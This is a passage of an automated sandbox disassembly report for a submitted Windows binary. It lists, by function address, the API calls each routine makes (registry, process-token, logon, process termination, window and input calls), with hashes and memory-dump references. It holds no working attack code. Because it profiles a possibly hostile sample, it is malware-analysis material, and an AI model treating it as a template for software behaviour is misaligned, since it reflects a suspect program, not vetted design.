                      • Part of subcall function 00681D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00681D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007078A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007078AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007078B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007078C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007078D4
                    Strings
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,006A4292,?), ref: 006A41E3
                    • GetProcAddress.KERNEL32(00000000), ref: 006A41EA
                    • EncodePointer.KERNEL32(00000000), ref: 006A41F6
                    • DecodePointer.KERNEL32(00000001,006A4292,?), ref: 006A4213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: f1c01607359b1c778ba3c161b0a8dac95cf963dbe41689194871ab55c6df349c
                    • Instruction ID: 0bd265b8c576322db4f3800e275d2d8d113a2c38e1577b38dde1b3957347a2ef
                    • Opcode Fuzzy Hash: f1c01607359b1c778ba3c161b0a8dac95cf963dbe41689194871ab55c6df349c
                    • Instruction Fuzzy Hash: 07E01AF8690348EEEF206BB4EC09B543AA5BB66706F10C525F421E55E0DFBD58D1AF08
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006A41B8), ref: 006A42B8
                    • GetProcAddress.KERNEL32(00000000), ref: 006A42BF
                    • EncodePointer.KERNEL32(00000000), ref: 006A42CA
                    • DecodePointer.KERNEL32(006A41B8), ref: 006A42E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: a6cb6ee2f712417da2001d06ce5a97aac32e4f3c9e59e46afc4e03ebf76d93ad
                    • Instruction ID: 2bbc6103a92313c8056abdd94ec8e069cc2c80e7abc594345e1a8bf7a0592e45
                    • Opcode Fuzzy Hash: a6cb6ee2f712417da2001d06ce5a97aac32e4f3c9e59e46afc4e03ebf76d93ad
                    • Instruction Fuzzy Hash: 3AE0BF7C641304EBDB209B64FC0EB443AA5B716742F20C125F001E15A0CFBC4591DA1C
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                    • Instruction ID: cdd0ac7b1b1cbe5cda04cdfa3973c6740c057debc8533a6632e83dcbcbbbcd46
                    • Opcode Fuzzy Hash: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                    • Instruction Fuzzy Hash: 43619A3050129A9FCF51FF21CC81EFE37AAAF55348F08461DF85A6B292DA309D42CB64
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 007010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00700588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007005AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007005D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00700617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00700624
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: a3f0ee32cf58d60aa6def6862a861e46155cdfd568279f4e4466e06a0cc478fd
                    • Instruction ID: d54f9ab619dcda1f9d8bc474b200bdd6b04cfc4d36660d25bc274d43d87711b4
                    • Opcode Fuzzy Hash: a3f0ee32cf58d60aa6def6862a861e46155cdfd568279f4e4466e06a0cc478fd
                    • Instruction Fuzzy Hash: 26514831108200EFCB14EB24C885E6FBBEAFF89714F044A2DF595872A1DB35E914CB96
                    APIs
                    • GetMenu.USER32(?), ref: 00705A82
                    • GetMenuItemCount.USER32(00000000), ref: 00705AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00705AE1
                    • GetMenuItemID.USER32(?,?), ref: 00705B50
                    • GetSubMenu.USER32(?,?), ref: 00705B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00705BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 432422b509df3378ec1de459b3266b621b6cc35babd35c668f54b4281b4dcc32
                    • Instruction ID: 01a5cdd4339b943eb9108de65f4ba46106744f75b507cc6fde8bc3b3e4bf366e
                    • Opcode Fuzzy Hash: 432422b509df3378ec1de459b3266b621b6cc35babd35c668f54b4281b4dcc32
                    • Instruction Fuzzy Hash: A6516D75A00615EFCB11EF64C845AAEBBF5EF48310F144559E812BB391CB78AE41CF94
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 006DF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 006DF469
                    • VariantClear.OLEAUT32(00000000), ref: 006DF4C4
                    • _memmove.LIBCMT ref: 006DF4EE
                    • VariantClear.OLEAUT32(?), ref: 006DF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006DF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 1759c123a3f2841500f1cd6ff55d1b366492ed60e06286bea1bd99de0772023b
                    • Instruction ID: 58e6cadce2bf3432f6fd10550dea0fdd0251f9690e84917eedb45be54afab569
                    • Opcode Fuzzy Hash: 1759c123a3f2841500f1cd6ff55d1b366492ed60e06286bea1bd99de0772023b
                    • Instruction Fuzzy Hash: 305157B5A00209EFCB10CF58D880AAAB7F9FF4C314B15856AED59DB301D730E912CBA0
                    APIs
                    • _memset.LIBCMT ref: 006E2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006E2792
                    • IsMenu.USER32(00000000), ref: 006E27B2
                    • CreatePopupMenu.USER32 ref: 006E27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 006E2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006E2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 3206457cede62461585470aefe14cf9f7205c500b010d1b2f199265013e965fa
                    • Instruction ID: c4be2f2832cbff517b2a5df22f7e1bca478aea38eec891c1efbc81d7795e743c
                    • Opcode Fuzzy Hash: 3206457cede62461585470aefe14cf9f7205c500b010d1b2f199265013e965fa
                    • Instruction Fuzzy Hash: 10519070902387DBDF24CF6AC8A8AEEBBFBBF44314F104269E4159B291D7708949CB51
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0068179A
                    • GetWindowRect.USER32(?,?), ref: 006817FE
                    • ScreenToClient.USER32(?,?), ref: 0068181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0068182C
                    • EndPaint.USER32(?,?), ref: 00681876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 27322765d3e02ed242e09df6fd82a33bae329744eba2fea12232c689a8b93630
                    • Instruction ID: 40801c47f470823e75b3373959360156eba83c9e65735b5f14b44c291cfcc9d5
                    • Opcode Fuzzy Hash: 27322765d3e02ed242e09df6fd82a33bae329744eba2fea12232c689a8b93630
                    • Instruction Fuzzy Hash: 9A41A0B0504300DFD710EF24CC85FBA7BEDEB4A724F044729F5948A2A1C7759846DB66
                    APIs
                    • ShowWindow.USER32(007467B0,00000000,00CD5738,?,?,007467B0,?,0070B862,?,?), ref: 0070B9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 0070B9F0
                    • ShowWindow.USER32(007467B0,00000000,00CD5738,?,?,007467B0,?,0070B862,?,?), ref: 0070BA50
                    • ShowWindow.USER32(00000000,00000004,?,0070B862,?,?), ref: 0070BA62
                    • EnableWindow.USER32(00000000,00000001), ref: 0070BA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0070BAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: cf3d85842852ec6b44dc4ae88129ce2e594f866aefd21de4d89df4282c586c4b
                    • Instruction ID: 02016aae7a4b81485dfba5c58e0468c3f64f3ea303dd9223eac1b52d1575be75
                    • Opcode Fuzzy Hash: cf3d85842852ec6b44dc4ae88129ce2e594f866aefd21de4d89df4282c586c4b
                    • Instruction Fuzzy Hash: EA414174600241EFDB26CF28C489B957BE1FF05714F1883B9EA488F6E2C739A945CB61
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,006F5134,?,?,00000000,00000001), ref: 006F73BF
                      • Part of subcall function 006F3C94: GetWindowRect.USER32(?,?), ref: 006F3CA7
                    • GetDesktopWindow.USER32 ref: 006F73E9
                    • GetWindowRect.USER32(00000000), ref: 006F73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006F7422
                      • Part of subcall function 006E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E555E
                    • GetCursorPos.USER32(?), ref: 006F744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006F74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 6646d4ed0eead4754c62efeba2fa1e996c5fdcb6b1d092c589ed28ee87cdaf69
                    • Instruction ID: 7c1e56b4d6f09f98e3ced9e02947dc9e5bc2b526d856a328a922e6322db5bbe4
                    • Opcode Fuzzy Hash: 6646d4ed0eead4754c62efeba2fa1e996c5fdcb6b1d092c589ed28ee87cdaf69
                    • Instruction Fuzzy Hash: 4831E472509309ABD720DF14DC49FABBBEAFF88314F004A19F58997191CB34E909CB96
                    APIs
                      • Part of subcall function 006D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006D8608
                      • Part of subcall function 006D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006D8612
                      • Part of subcall function 006D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006D8621
                      • Part of subcall function 006D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006D8628
                      • Part of subcall function 006D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006D863E
                    • GetLengthSid.ADVAPI32(?,00000000,006D8977), ref: 006D8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006D8DB8
                    • HeapAlloc.KERNEL32(00000000), ref: 006D8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 006D8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,006D8977), ref: 006D8DEC
                    • HeapFree.KERNEL32(00000000), ref: 006D8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 2079e0c1f18685f5160fca0289a2770d32d7496156dc778fb735394bb5e82044
                    • Instruction ID: 0cdb53129ff810b185e9fd4e72d2efe09c9e8393613ad913d1f8d8c60065789c
                    • Opcode Fuzzy Hash: 2079e0c1f18685f5160fca0289a2770d32d7496156dc778fb735394bb5e82044
                    • Instruction Fuzzy Hash: 8C119D71901605EFDB21DF64DC09BAEB77BEF55315F10812AE885D7390CB359900CB64
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006D8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 006D8B31
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006D8B40
                    • CloseHandle.KERNEL32(00000004), ref: 006D8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006D8B7A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 006D8B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: f1d0e8cd32d31837099513fa97d2d28ec9688a1fffdc50c754061c32138ca8fb
                    • Instruction ID: ca8502c1d387cb9aa9e3720ab8489ac42b3dedb15169f2a71559f0018fe611cc
                    • Opcode Fuzzy Hash: f1d0e8cd32d31837099513fa97d2d28ec9688a1fffdc50c754061c32138ca8fb
                    • Instruction Fuzzy Hash: 6C115CB2500209EFDF118FA4DD49FDE7BA9EF08704F048166FE04A2260CB759D609B61
                    APIs
                      • Part of subcall function 006812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0068134D
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068135C
                      • Part of subcall function 006812F3: BeginPath.GDI32(?), ref: 00681373
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0070C1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 0070C1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0070C1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 0070C1F6
                    • EndPath.GDI32(00000000), ref: 0070C206
                    • StrokePath.GDI32(00000000), ref: 0070C216
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: c4b2c399bbe24222bd1a1d6fedb255b6cc611fcb1eff424bb3257a300d9e9c4e
                    • Instruction ID: 0a61463cb21ee4cb5631edc2ce3692875a587aaed61eb48ce46e117cf4d46b5c
                    • Opcode Fuzzy Hash: c4b2c399bbe24222bd1a1d6fedb255b6cc611fcb1eff424bb3257a300d9e9c4e
                    • Instruction Fuzzy Hash: DA11097640010CFFDB129F90DC88FAA7FADEB09354F048122FA188A5A1C7759E95DBA4
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A03D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 006A03DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A03E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A03F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 006A03F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006A0401
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 5455f38710dbcff0f48f6afaf41e62d25ee6c5cc0e73bdec273a16a70135fe3b
                    • Instruction ID: 02263870e832b8fb894098485bbe17b4d4e25c7dd08a9925638d338780a2bcb5
                    • Opcode Fuzzy Hash: 5455f38710dbcff0f48f6afaf41e62d25ee6c5cc0e73bdec273a16a70135fe3b
                    • Instruction Fuzzy Hash: 7B016CB0901759BDE3008F5A8C85B52FFA8FF19354F00421BE15C47941C7F5A864CBE5
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006E569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006E56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 006E56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006E56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006E56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006E56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: f3e44023dc378a5600e32f3d40b962fcb92df83d0ddddc77dbbea77990f44891
                    • Instruction ID: 8b8f929ee40be2f3773b5683105485a0bf7ea5e2c2605fc29f3cde53a0305920
                    • Opcode Fuzzy Hash: f3e44023dc378a5600e32f3d40b962fcb92df83d0ddddc77dbbea77990f44891
                    • Instruction Fuzzy Hash: F2F01D32241158FBE7315BA29C0DEEB7B7CEBC6B15F004269FA05D14609EA51A0186B9
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 006E74E5
                    • EnterCriticalSection.KERNEL32(?,?,00691044,?,?), ref: 006E74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00691044,?,?), ref: 006E7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00691044,?,?), ref: 006E7510
                      • Part of subcall function 006E6ED7: CloseHandle.KERNEL32(00000000,?,006E751D,?,00691044,?,?), ref: 006E6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006E7523
                    • LeaveCriticalSection.KERNEL32(?,?,00691044,?,?), ref: 006E752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
